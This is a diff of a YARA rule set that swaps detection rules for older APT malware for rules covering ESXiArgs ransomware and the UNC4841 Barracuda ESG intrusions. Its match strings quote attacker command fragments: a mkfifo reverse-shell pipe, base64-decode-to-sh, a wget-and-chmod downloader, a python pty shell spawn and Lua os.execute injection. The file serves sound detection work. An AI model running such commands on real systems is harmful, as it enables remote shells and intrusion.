-		$xe2 = "0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANgBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMAXA"
-		$xe3 = "NAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADYAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTAFwA"
-		$xe4 = "TQBJAEMAUgBPAFMAfgAxAFwAVwBFAEIAUwBFAFIAfgAxAFwAMQA1AFwAVABFAE0AUABMAEEAVABFAFwATABBAFkATwBVAFQAUwBcA"
-		$xe5 = "0ASQBDAFIATwBTAH4AMQBcAFcARQBCAFMARQBSAH4AMQBcADEANQBcAFQARQBNAFAATABBAFQARQBcAEwAQQBZAE8AVQBUAFMAXA"
-		$xe6 = "NAEkAQwBSAE8AUwB+ADEAXABXAEUAQgBTAEUAUgB+ADEAXAAxADUAXABUAEUATQBQAEwAQQBUAEUAXABMAEEAWQBPAFUAVABTAFwA"
-
-	condition:
-		1 of them
-}
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_1 : FILE
-{
-	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "21e858b1-2cfa-5757-96f0-7c44a5da6898"
-		date = "2016-12-14"
+		id = "d1282dee-0496-52f1-a2b7-27657ab4df8c"
+		date = "2023-02-06"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L10-L27"
+		reference = "https://dev.to/xakrume/esxiargs-encryption-malware-launches-massive-attacks-against-vmware-esxi-servers-pfe"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L89-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "143e52eedc5c3be9bbf0f916b232de26e4ed5c7e81e3f77cae70e6af84d31de1"
-		score = 75
+		logic_hash = "3f240784873a0239cbf61f7f420fdd72b8992d5943ffc3d4dcad43c836569f4d"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e12031da58c0b08e8b610c3786ca2b66fcfea8ddc9ac558d08a29fd27e95a3e7"
 
 	strings:
-		$s1 = "c:\\Windows\\system32\\syswindxr32.dll" fullword wide
-		$s2 = "c:\\windows\\temp\\TrueCrypt-Setup-7.1a-tamindir.exe" fullword wide
-		$s3 = "%s\\ssleay32.dll" fullword wide
-		$s4 = "%s\\libeay32.dll" fullword wide
-		$s5 = "%s\\fprot32.exe" fullword wide
+		$x1 = "echo \"START ENCRYPT: $file_e SIZE: $size_kb STEP SIZE: " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 10000KB and 3 of them ) or ( all of them )
+		filesize < 10KB and 1 of them
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_2 : FILE
+rule SIGNATURE_BASE_SUSP_Esxiargs_Endpoint_Conf_Aug23 : FILE
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5858541b-c394-5be8-9db3-fcff66f635de"
-		date = "2016-12-14"
+		description = "Detects indicators found in endpoint.conf files as modified by actors in the ESXiArgs campaign"
+		author = "Florian Roth"
+		id = "3e0b5dbf-7c5b-5599-823a-ce35fbdbe64b"
+		date = "2023-08-04"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L29-L45"
+		reference = "https://www.bleepingcomputer.com/forums/t/782193/esxi-ransomware-help-and-support-topic-esxiargs-args-extension/page-47"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ransom_esxi_attacks_feb23.yar#L103-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d97ee2698b6a09da7f8c6850583ec7493cc288368b98b20790dd8305521f894"
+		logic_hash = "794d460eec0e2f0b48e6ced94b125a1e48acde6be6281866e0b4a2ae6c2d3b51"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1aef507c385a234e8b10db12852ad1bd66a04730451547b2dcb26f7fae16e01f"
 
 	strings:
-		$s1 = "winasys32.exe" fullword ascii
-		$s2 = "alg32.exe" fullword ascii
-		$s3 = "wmsrv32.exe" fullword ascii
-		$s4 = "vmnat32.exe" fullword ascii
+		$a1 = "/client/clients.xml" ascii
+		$a2 = "/var/run/vmware/proxy-sdk-tunnel" ascii fullword
+		$a3 = "redirect" ascii fullword
+		$a4 = "allow" ascii fullword
+		$s1 = " local 8008 allow allow"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them ) or ( 3 of them )
+		filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_3 : FILE
+rule SIGNATURE_BASE_APT_UNC4841_ESG_Barracuda_CVE_2023_2868_Forensic_Artifacts_Jun23_1 : SCRIPT CVE_2023_2868
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bff79813-0d72-50d9-9676-794801edc34b"
-		date = "2016-12-14"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L47-L63"
+		description = "Detects forensic artifacts found in the exploitation of CVE-2023-2868 in Barracuda ESG devices by UNC4841"
+		author = "Florian Roth"
+		id = "50518fa1-33de-5fe5-b957-904d976fb29a"
+		date = "2023-06-15"
+		modified = "2023-06-16"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L2-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "47595e07b59744f520cd9025bcec267384329b7687fd25842f5f7a8f4b360674"
+		logic_hash = "fa7cac1e0f6cb6fa3ac271c1fff0039ff182b6859920b4eca25541457654acde"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f98ac11c78ad1b4c5c5c10a88857baf7af43acb9162e8077709db9d563bcf02"
+		tags = "SCRIPT, CVE-2023-2868"
 
 	strings:
-		$s1 = "%s SslHandshakeDone(%d) %d. Secure connection with %s, cipher %s, %d secret bits (%d total), session reused=%s" fullword ascii
-		$s2 = "mvhost32.dll" fullword ascii
-		$s3 = "sdwin32.dll" fullword ascii
-		$s4 = "ofx64.dll" fullword ascii
+		$x01 = "=;ee=ba;G=s;_ech_o $abcdefg_${ee}se64" ascii
+		$x02 = ";echo $abcdefg | base64 -d | sh" ascii
+		$x03 = "setsid sh -c \"mkfifo /tmp/p" ascii
+		$x04 = "sh -i </tmp/p 2>&1" ascii
+		$x05 = "if string.match(hdr:body(), \"^[%w%+/=" ascii
+		$x06 = "setsid sh -c \"/sbin/BarracudaMailService eth0\""
+		$x07 = "echo \"set the bvp ok\""
+		$x08 = "find ${path} -type f ! -name $excludeFileNameKeyword | while read line ;"
+		$x09 = " /mail/mstore | xargs -i cp {} /usr/share/.uc/"
+		$x10 = "tar -T /mail/mstore/tmplist -czvf "
+		$sa1 = "sh -c wget --no-check-certificate http"
+		$sa2 = ".tar;chmod +x "
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them ) or ( all of them )
+		1 of ( $x* ) or all of ( $sa* )
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_4 : FILE
+rule SIGNATURE_BASE_APT_MAL_UNC4841_SEASPY_Jun23_1 : CVE_2023_2868 FILE
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4e926b1c-bf10-5337-8c3a-964008a37d8b"
-		date = "2016-12-14"
+		description = "Detects SEASPY malware used by UNC4841 in attacks against Barracuda ESG appliances exploiting CVE-2023-2868"
+		author = "Florian Roth"
+		id = "bcff58f8-87f6-5371-8b96-5d4c0f349000"
+		date = "2023-06-16"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L65-L85"
+		reference = "https://blog.talosintelligence.com/alchimist-offensive-framework/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L30-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0e8bb00133a94b29c482b9785048025a62e2706f3653c1915be7b702fbfe48d6"
-		score = 75
+		logic_hash = "c1dcb841fb872f0d5e661bfd90fca3075f5efc95b1f9dfff72fa318ed131e9d1"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15ededb19ec5ab6f03db1106d2ccdeeacacdb8cd708518d065cacb1b0d7e955d"
+		tags = "CVE-2023-2868, FILE"
+		hash1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
 
 	strings:
-		$s1 = "c:\\windows\\temp\\winrar.exe" fullword wide
-		$s2 = "info@aadobetech.com" fullword ascii
-		$s3 = "%s\\ssleay32.dll" fullword wide
-		$s4 = "%s\\libeay32.dll" fullword wide
-		$s5 = "%s\\fprot32.exe" fullword wide
-		$s6 = "ADOBE Corp.1" fullword ascii
-		$s7 = "Adobe Flash Player1\"0 " fullword ascii
-		$s8 = "Windows Index Services" fullword wide
+		$sx1 = "usage: ./BarracudaMailService <Network-Interface>. e.g.: ./BarracudaMailService eth0" ascii fullword
+		$s1 = "fcntl.tmp.amd64." ascii
+		$s2 = "Child process id:%d" ascii fullword
+		$s3 = "[*]Success!" ascii fullword
+		$s4 = "NO port code" ascii
+		$s5 = "enter open tty shell" ascii
+		$op1 = { 48 89 c6 f3 a6 0f 84 f7 01 00 00 bf 6c 84 5f 00 b9 05 00 00 00 48 89 c6 f3 a6 0f 84 6a 01 00 00 }
+		$op2 = { f3 a6 0f 84 d2 00 00 00 48 89 de bf 51 5e 61 00 b9 05 00 00 00 f3 a6 74 21 48 89 de }
+		$op3 = { 72 de 45 89 f4 e9 b8 f4 ff ff 48 8b 73 08 45 85 e4 ba 49 3d 62 00 b8 44 81 62 00 48 0f 45 d0 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 4 of them ) or ( 6 of them )
+		uint16( 0 ) == 0x457f and filesize < 9000KB and 3 of them or 5 of them
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_5 : FILE
+rule SIGNATURE_BASE_APT_MAL_UNC4841_SEASPY_LUA_Jun23_1 : FILE
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4bd60f61-a595-5289-9595-a7e33f265748"
-		date = "2016-12-14"
+		description = "Detects SEASPY malware related LUA script"
+		author = "Florian Roth"
+		id = "a44861d0-107e-589b-8cf1-3fbc2f5c78dc"
+		date = "2023-06-16"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L87-L105"
+		reference = "https://blog.talosintelligence.com/alchimist-offensive-framework/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L57-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "69433fae4d51f7fd7b6f5b683f9c751d0f0352b8ed805a8177085e635eb26260"
-		score = 75
+		logic_hash = "f78823a4ba9e025ba4833a2d5234c7baba33c1167c0247f13b8b2baa430aa4e5"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a8b7e3edaa18c6127e98741503c3a2a66b7720d2abd967c94b8a5f2e99575ac5"
+		hash1 = "56e8066bf83ff6fe0cec92aede90f6722260e0a3f169fc163ed88589bffd7451"
 
 	strings:
-		$s1 = "Winxsys.exe" fullword wide
-		$s2 = "%s\\ssleay32.dll" fullword wide
-		$s3 = "%s\\libeay32.dll" fullword wide
-		$s4 = "Windows Index Services" fullword wide
-		$s5 = "<F RAT" fullword ascii
-		$s6 = "WININDX-088FA840-B10D-11D3-BC36-006067709674" fullword wide
+		$x1 = "os.execute('rverify'..' /tmp/'..attachment:filename())" ascii fullword
+		$x2 = "log.debug(\"--- opening archive [%s], mimetype [%s]\", tmpfile" ascii fullword
+		$xe1 = "os.execute('rverify'..' /tmp/'..attachment:filename())" ascii base64
+		$xe2 = "log.debug(\"--- opening archive [%s], mimetype [%s]\", tmpfile" ascii base64
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and 3 of them )
+		filesize < 500KB and 1 of them
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_6 : FILE
+rule SIGNATURE_BASE_APT_HKTL_Proxy_Tool_Jun23_1 : FILE
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0f36eb56-39d8-536c-93ff-4a2352163612"
-		date = "2016-12-14"
+		description = "Detects agent used as proxy tool in UNC4841 intrusions - possibly Alchemist C2 framework implant"
+		author = "Florian Roth"
+		id = "0e406737-3083-53c2-a6d2-14c07794125a"
+		date = "2023-06-16"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_promethium_neodymium.yar#L107-L125"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L76-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6cfccb863c3ea8f3f60520b0df03eee8e3b754699aa339fea21489d34e29f47b"
+		logic_hash = "7e2152e1aa74e1842519e2eecd2acd3ef8eb8d517f3c0ef9f05c983616f223c3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dbd8cbbaf59d19cf7566042945e36409cd090bc711e339d3f2ec652bc26d6a03"
+		hash1 = "ca72fa64ed0a9c22d341a557c6e7c1b6a7264b0c4de0b6f717dd44bddf550bca"
+		hash2 = "57e4b180fd559f15b59c43fb3335bd59435d4d76c4676e51a06c6b257ce67fb2"
 
 	strings:
-		$s1 = "c:\\Windows\\system32\\syswindxr32.dll" fullword wide
-		$s2 = "c:\\windows\\temp\\TrueCrypt-7.2.exe" fullword wide
-		$s3 = "%s\\ssleay32.dll" fullword wide
-		$s4 = "%s\\libeay32.dll" fullword wide
-		$s5 = "%s\\fprot32.exe" fullword wide
-		$s6 = "Windows Index Services" fullword wide
+		$a2 = "/src/runtime/panic.go"
+		$s1 = "main.handleClientRequest" ascii fullword
+		$s2 = "main.sockIP.toAddr" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 7000KB and 4 of them )
+		( uint16( 0 ) == 0x5a4d or uint32be( 0 ) == 0x7f454c46 or uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca or uint32( 0 ) == 0xbebafeca ) and filesize < 10MB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Win_Bluelight_B : INKYSQUID
+rule SIGNATURE_BASE_SUSP_Fscan_Port_Scanner_Output_Jun23 : SCRIPT FILE
 {
 	meta:
-		description = "North Korean origin malware which uses a custom Google App for c2 communications."
-		author = "threatintel@volexity.com"
-		id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc"
-		date = "2021-06-21"
+		description = "Detects output generated by the command line port scanner FScan"
+		author = "Florian Roth"
+		id = "7eb4b27f-0c5b-5d7e-b759-95d7894d5822"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt37_bluelight.yar#L12-L112"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L103-L117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a6e83ca2ae15f1a7819f065449f84166da401739d091565605d62ebba3d47a50"
-		score = 75
-		quality = 60
-		tags = "INKYSQUID"
-		hash1 = "837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed"
-		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
+		logic_hash = "49b5055c96d7b7446ee5ae8667a5aa3645f0f98d8b5f2bffcd6ef3b20bc64e05"
+		score = 70
+		quality = 85
+		tags = "SCRIPT, FILE"
 
 	strings:
-		$magic = "host_name: %ls, cookie_name: %s, cookie: %s, CT: %llu, ET: %llu, value: %s, path: %ls, secu: %d, http: %d, last: %llu, has: %d"
-		$f1 = "%ls.INTEG.RAW" wide
-		$f2 = "edb.chk" ascii
-		$f3 = "edb.log" ascii
-		$f4 = "edbres00001.jrs" ascii
-		$f5 = "edbres00002.jrs" ascii
-		$f6 = "edbtmp.log" ascii
-		$f7 = "cheV01.dat" ascii
-		$chrome1 = "Failed to get chrome cookie"
-		$chrome2 = "mail.google.com, cookie_name: OSID"
-		$chrome3 = ".google.com, cookie_name: SID,"
-		$chrome4 = ".google.com, cookie_name: __Secure-3PSID,"
-		$chrome5 = "Failed to get Edge cookie"
-		$chrome6 = "google.com, cookie_name: SID,"
-		$chrome7 = "google.com, cookie_name: __Secure-3PSID,"
-		$chrome8 = "Failed to get New Edge cookie"
-		$chrome9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
-		$chrome10 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
-		$chrome11 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
-		$chrome12 = "https://mail.google.com"
-		$chrome13 = "result.html"
-		$chrome14 = "GM_ACTION_TOKEN"
-		$chrome15 = "GM_ID_KEY="
-		$chrome16 = "/mail/u/0/?ik=%s&at=%s&view=up&act=prefs"
-		$chrome17 = "p_bx_ie=1"
-		$chrome18 = "myaccount.google.com, cookie_name: OSID"
-		$chrome19 = "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3"
-		$chrome20 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
-		$chrome21 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
-		$chrome22 = "https://myaccount.google.com"
-		$chrome23 = "result.html"
-		$chrome24 = "myaccount.google.com"
-		$chrome25 = "/_/AccountSettingsUi/data/batchexecute"
-		$chrome26 = "f.req=%5B%5B%5B%22BqLdsd%22%2C%22%5Btrue%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at="
-		$chrome27 = "response.html"
-		$msg1 = "https_status is %s"
-		$msg2 = "Success to find GM_ACTION_TOKEN and GM_ID_KEY"
-		$msg3 = "Failed to find GM_ACTION_TOKEN and GM_ID_KEY"
-		$msg4 = "Failed HttpSendRequest to mail.google.com"
-		$msg5 = "Success to enable imap"
-		$msg6 = "Failed to enable imap"
-		$msg7 = "Success to find SNlM0e"
-		$msg8 = "Failed to find SNlM0e"
-		$msg9 = "Failed HttpSendRequest to myaccount.google.com"
-		$msg10 = "Success to enable thunder access"
-		$msg11 = "Failed to enable thunder access"
-		$keylogger_component1 = "[TAB]"
-		$keylogger_component2 = "[RETURN]"
-		$keylogger_component3 = "PAUSE"
-		$keylogger_component4 = "[ESC]"
-		$keylogger_component5 = "[PAGE UP]"
-		$keylogger_component6 = "[PAGE DOWN]"
-		$keylogger_component7 = "[END]"
-		$keylogger_component8 = "[HOME]"
-		$keylogger_component9 = "[ARROW LEFT]"
-		$keylogger_component10 = "[ARROW UP]"
-		$keylogger_component11 = "[ARROW RIGHT]"
-		$keylogger_component12 = "[ARROW DOWN]"
-		$keylogger_component13 = "[INS]"
-		$keylogger_component14 = "[DEL]"
-		$keylogger_component15 = "[WIN]"
-		$keylogger_component16 = "[NUM *]"
-		$keylogger_component17 = "[NUM +]"
-		$keylogger_component18 = "[NUM ,]"
-		$keylogger_component19 = "[NUM -]"
-		$keylogger_component20 = "[NUM .]"
-		$keylogger_component21 = "NUM /]"
-		$keylogger_component22 = "[NUMLOCK]"
-		$keylogger_component23 = "[SCROLLLOCK]"
-		$keylogger_component24 = "Time: "
-		$keylogger_component25 = "Window: "
-		$keylogger_component26 = "CAPSLOCK+"
-		$keylogger_component27 = "SHIFT+"
-		$keylogger_component28 = "CTRL+"
-		$keylogger_component29 = "ALT+"
+		$s1 = "[*] NetInfo:" ascii
+		$s2 = ":443 open" ascii
+		$s3 = "   [->]"
 
 	condition:
-		$magic or ( all of ( $f* ) and 5 of ( $keylogger_component* ) ) or 24 of ( $chrome* ) or 4 of ( $msg* ) or 27 of ( $keylogger_component* )
+		filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_Win_Bluelight : INKYSQUID
+rule SIGNATURE_BASE_SUSP_PY_Shell_Spawn_Jun23_1 : SCRIPT
 {
 	meta:
-		description = "The BLUELIGHT malware family. Leverages Microsoft OneDrive for network communications."
-		author = "threatintel@volexity.com"
-		id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc"
-		date = "2021-04-23"
+		description = "Detects suspicious one-liner to spawn a shell using Python"
+		author = "Florian Roth"
+		id = "15fd2c9a-c425-5d4d-9209-fd3826074d6c"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt37_bluelight.yar#L114-L144"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L119-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "52589348f42aadbe453ad8a40ac36b58fcc9e07cd298486f09b6f793823d8cc7"
-		score = 75
+		logic_hash = "63e94447930d5a00399de753076facbfb2bf18dd8c815f01aaefd14678aea034"
+		score = 70
 		quality = 85
-		tags = "INKYSQUID"
-		hash1 = "7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d"
-		hash2 = "94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a"
-		license = "See license at https://github.com/volexity/threat-intel/LICENSE.txt"
+		tags = "SCRIPT"
 
 	strings:
-		$pdb1 = "\\Development\\BACKDOOR\\ncov\\"
-		$pdb2 = "Release\\bluelight.pdb"
-		$msg0 = "https://ipinfo.io" fullword
-		$msg1 = "country" fullword
-		$msg5 = "\"UserName\":\"" fullword
-		$msg7 = "\"ComName\":\"" fullword
-		$msg8 = "\"OS\":\"" fullword
-		$msg9 = "\"OnlineIP\":\"" fullword
-		$msg10 = "\"LocalIP\":\"" fullword
-		$msg11 = "\"Time\":\"" fullword
-		$msg12 = "\"Compiled\":\"" fullword
-		$msg13 = "\"Process Level\":\"" fullword
-		$msg14 = "\"AntiVirus\":\"" fullword
-		$msg15 = "\"VM\":\"" fullword
+		$x1 = "python -c import pty;pty.spawn(\"/bin/" ascii
 
 	condition:
-		any of ( $pdb* ) or all of ( $msg* )
+		1 of them
 }
-rule SIGNATURE_BASE_Malware_Sakula_Xorloop : FILE
+rule SIGNATURE_BASE_APT_MAL_Hunting_LUA_SEASIDE_1 : FILE
 {
 	meta:
-		description = "XOR loops from Sakula malware"
-		author = "David Cannings"
-		id = "9349b7e4-560c-5d8b-94d9-cbb9fd09e132"
-		date = "2016-06-13"
-		modified = "2023-01-27"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sakula.yar#L1-L18"
+		description = "Hunting rule looking for strings observed in SEASIDE samples."
+		author = "Mandiant"
+		id = "86eaff7b-4ca0-53cd-8886-da66a36c778f"
+		date = "2023-06-15"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L136-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fc6497fe708dbda9355139721b6181e7"
-		logic_hash = "b3c3131693e18ce2cf26786a93b61d39d90703d8c827de1340f85377fe7b59de"
-		score = 75
+		hash = "cd2813f0260d63ad5adf0446253c2172"
+		logic_hash = "82b61325a78bf8ab09d426cfadceb614a256dfcafb2e1f75595de63593ed2574"
+		score = 70
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$opcodes_decode_loop01 = { 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B }
-		$opcodes_decode_loop02 = { 8B 45 08 8D 0C 02 8A 01 84 C0 74 08 3C ?? 74 04 34 ?? 88 01 }
+		$s1 = "function on_helo()"
+		$s2 = "local bindex,eindex = string.find(helo,'.onion')"
+		$s3 = "helosend = 'pd'..' '..helosend"
+		$s4 = "os.execute(helosend)"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $opcodes* )
+		filesize < 1MB and all of ( $s* )
 }
-rule SIGNATURE_BASE_Malware_Sakula_Memory
+rule SIGNATURE_BASE_APT_MAL_LNX_Hunting_Linux_WHIRLPOOL_1 : FILE
 {
 	meta:
-		description = "Sakula malware - strings after unpacking (memory rule)"
-		author = "David Cannings"
-		id = "328e3707-d11d-5b7f-bec4-18a42a2c658b"
-		date = "2016-06-13"
+		description = "Hunting rule looking for strings observed in WHIRLPOOL samples."
+		author = "Mandiant"
+		id = "a997bd65-c502-53a0-8bb8-62daaa916f0d"
+		date = "2023-06-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sakula.yar#L20-L45"
+		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_barracuda_esg_unc4841_jun23.yar#L154-L173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b3852b9e7f2b8954be447121bb6b65c3"
-		logic_hash = "ba6d93a1fc5fd81748eb462fc55b681987126ba853ddb677a5f1f9b74ba5cde8"
-		score = 75
+		hash = "177add288b289d43236d2dba33e65956"
+		logic_hash = "d03c0e292b9b97bbf76585fc74208e4263d753807b8e4a445be80d41264d5432"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$str01 = "cmd.exe /c ping 127.0.0.1 & del \"%s\""
-		$str02 = "cmd.exe /c rundll32 \"%s\" Play \"%s\""
-		$str03 = "Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.1;+SV1)"
-		$str04 = "cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c \"%s\""
-		$str05 = "Self Process Id:%d"
-		$str06 = "%d_%d_%d_%s"
-		$str07 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
